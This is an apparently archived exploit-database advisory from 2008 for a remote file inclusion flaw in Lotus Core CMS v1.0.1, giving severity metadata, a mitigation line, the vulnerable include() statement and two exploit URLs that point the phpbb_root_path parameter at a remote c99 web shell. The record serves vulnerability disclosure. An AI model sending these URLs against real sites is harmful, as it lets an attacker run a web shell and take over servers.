[phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities

vendor:

Lotus Core CMS

by:

Ciph3r

9.3

CVSS

HIGH

Remote File Include

CWE

Product Name: Lotus Core CMS

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:lotus_core:lotus_core_cms:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

[phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities

A remote file include vulnerability exists in Lotus Core CMS v1.0.1. An attacker can exploit this vulnerability to include a remote file containing malicious code and execute it on the vulnerable system. This can be exploited by sending a specially crafted HTTP request containing the malicious code to the vulnerable system.

Mitigation:

Upgrade to the latest version of Lotus Core CMS v1.0.1 or apply the patch from the vendor.

Source

Exploit-DB raw data:

###############################################################
#
# [phpbb3] Lotus Core CMS v1.0.1 Remote File Include Vulnerabilities 
#
###############################################################
#
# Discovered by : Ciph3r
#
#
# MAIL : Ciph3r_blackhat@yahoo.com
#
#
# SP TANX4 : Iranian hacker & Kurdish Security TEAM 
#
# CLASS : remote
#
# download cms: http://sourceforge.net/project/showfiles.php?group_id=215112
#
################################################################
#
# C0de : 
#                
#                  
#    include($phpbb_root_path . 'includes/bbcode.' . $phpEx);
#       
#        
###############################################################

EXPLOIT :

 
 http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/index.php?phpbb_root_path=http://127.0.0.1/c99.php?
 
 http://127.0.0.1/cms/Lotus%20Core%20v1.0.1/system/plugins/error/404.php?phpbb_root_path=http://127.0.0.1/c99.php?


#####################################################################

# milw0rm.com [2008-06-19]